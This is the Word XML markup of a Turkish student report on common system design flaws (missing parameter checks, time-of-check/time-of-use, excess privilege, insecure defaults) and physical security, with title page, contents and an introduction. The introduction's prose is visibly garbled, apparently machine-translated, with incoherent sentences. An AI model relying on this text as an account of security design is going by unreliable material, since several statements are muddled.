      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73EAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Yaygın Sistem Tasarımı Kusurları ve Güvenlik Sorunları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Section: 6.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00287391" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73EAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Fiziksel Güvenlik: Kıvrımlı Erişim ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Katmanlı Savunma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Section: 10.1.1</w:t>
      </w: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Öğrencinin Adı</w:t>
      </w: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Mücahit ÖZGÜN</w:t>
      </w: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150707021</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Dersin Öğretim Görevlisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="002661C8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Prof. Dr. Abdulsamet HAŞILOĞLU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F254DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F254DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İÇİNDEKİLER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00307914" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307914">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Giriş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>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Güçsüz Kısıtlamalar</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armaşa</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Eksik Parametre Kontrolü</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Eksik Parametre Kontrolü Uygulaması</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Eksik Hata İşleme</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ullanım Süresi</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ontrol Süresi</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Etkin Olmayan Ciltleme</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ontrollerin Yetersiz Granülerliği</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Gratuitous İşlevselliği</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açış Mekanizmaları</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Aşırı Ayrıcalık</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Ayrıcalıklı Durum</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Ayrıcalıklı Durum Başarısızlığı</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Güvensiz Varsayılanlar</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Uygulama Kontrolleri</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Uygulama Kontrollerine Özel Güven</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Öneriler</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Fiziksel Güvenlik: Kıvrımlı Erişim ve Katmanlı Savunma</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 xml:space="preserve">Fiziksel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenliği Yaklaşımı</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Fiziksel Güvenlik Psikolojisi</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Tesis Fiziksel Güvenlik</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Tesis Sınıflandırması</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Tesis lokasyonu</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Fasite Tehditleri ve Kontrolleri</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Doğal Tehditler</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İnsan Yapımı Tehditler</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Çevresel Tehditler</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Tesis Koruma Stratejisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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Zoning</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lastRenderedPageBreak/>
        <w:t>Bilgi Sistemleri Fiziksel Güvenlik</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Bilgi Sistemi Sınıflandırması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50792">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bilgi Sistemleri Fiziksel Tehditler ve Kontroller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50792">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arkındalık Eğitimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kaynakça</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D50792" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="975"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="975"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="975"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="975"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00180500" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="975"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00885BCB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="975"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00885BCB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1416"/>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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0057263D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057263D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GİRİŞ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bu bölüm, uygulama ve sistem tasarımındaki yaygın hatalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ın çoğunu tanımlar ve açıklar. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu hataların sonuçlarını açıklar ve onlardan kaçınmak için önerilerde bulunur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zorlanmamış kısıtlamalar, karmaşıklık, eksik parametre kontrolü ve hata yönetimi, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>basit</w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> işlevsellik, kaçış mekanizmaları ve güvenli olmayan işlem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yapar</w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Turing Ödülünü kabul ettiğinde Ken Thompson bize bir program yazmazsa, biri tamamen ona güvenemez. Çoğu kişi, bir program yazmanın faydalı olsa bile yararlı olabileceğini fark eder. Yani, en yetenekli ve motive programcılar bile hatalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yapar</w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Öte yandan, birinin kullandığı her programı yazmak zorunda olsaydı, bilgisayarlar çok </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanışlı olmazdı</w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Güvenilir kod yazmayı ve tanımayı öğrenmek önemlidir. Tarihsel olarak, bilgisayar güvenlik topluluğu dış kaynaklı kontrollere güvenmeyi tercih etmiştir. Uygulama. Topluluk, bu kontrollerin daha güvenilir, etkili ve verimli olduğuna inanıyordu. Onlar daha güvenilir olduğu düşünülüyor çünkü daha az insanın kendileri üzerinde etkisi var ve bu insanlar daha uzak uygulamadan. Bypass'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a daha dayanıklı oldukları için daha etkili oldukları düşünülmektedir. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Onlar d</w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aha verimli oldukları düşünülmektedir, çünkü bunlar arasında çalışırlar ve birkaç uygulama tarafından paylaşılırlar. Bununla birlikte, uygulama kontrolleri her zaman önemli olmuştur. Ancak, modern sistemlerde, uygulama kontrollerine güven daha da artar. Uygulama oluşturucu, programının çalışacağı çevre hakkında bir fikre sahip olsa da, bunu belirleme yeteneği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ve kontrol çok düşük olabilir. Aslında, uygulamaların crossplatform dillerinde yazılması giderek daha yaygındır. Bu diller yazarın programında çalışıp çalışmayacağını bilmesini </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zorlaştırır</w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Tarihsel olarak, biri uygulamayı dış müdahale veya kirlenmeden korumak için çevreye güveniyordu; Modern sistemlerde, kendisini trafikten korumak için uygulamaya güvenmek gerekir. Dağıtık sistemlerde, çevresel kontroller geleneksel sistemlerden çok daha az güvenilirdir. Söylemek değil, yaygınlaştı. Rutin, uygulamalar tarafından kirletilecek sistemler için. Sektörün hızlı büyümesi sınırlı tecrübeye sahip kişilerin birçok program yazdığını göstermektedir. Çevre ve girdiler uyumlu olduğunda iyi işleyen kod yazmaları için yeterince zordur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>beklentilerine göre, değilken daha az. Uygulamalardaki kontrollerin geçmişi çok iyi olmamıştır. Piyasa için programlar yapılmış olmasına rağmen oldukça iyi, bir girişim için özel olarak yapılmış olanlar genellikle felakettir. Daha kötüsü, aynı hata türleri, 20 yıl önce görül</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>düğü gibi kendini gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003A072B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bölüm, bazı daha yaygın hataların bazılarını ve bunların çözümlerini ümit ederek açıklar ve tartışır. Gelecekte daha güvenilir programlar olacak. Her ne kadar göstermek için bazı çizimler kullanılsa da</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, b</w:t>
      </w:r>
      <w:r w:rsidRPr="003A072B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">u hataların nasıl kötüye kullanılması, okuyucudan hataların çoğunun akılda tutulması gerektiği </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sorulur.</w:t>
      </w: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spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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GÜÇSÜZ KISITLAMALAR</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Hesaplamanın ilk günlerinde, program yazarlarının kullanıcılardan gelen hata raporlarına yanıt vermesi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> alışılmadık bir durum değildi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
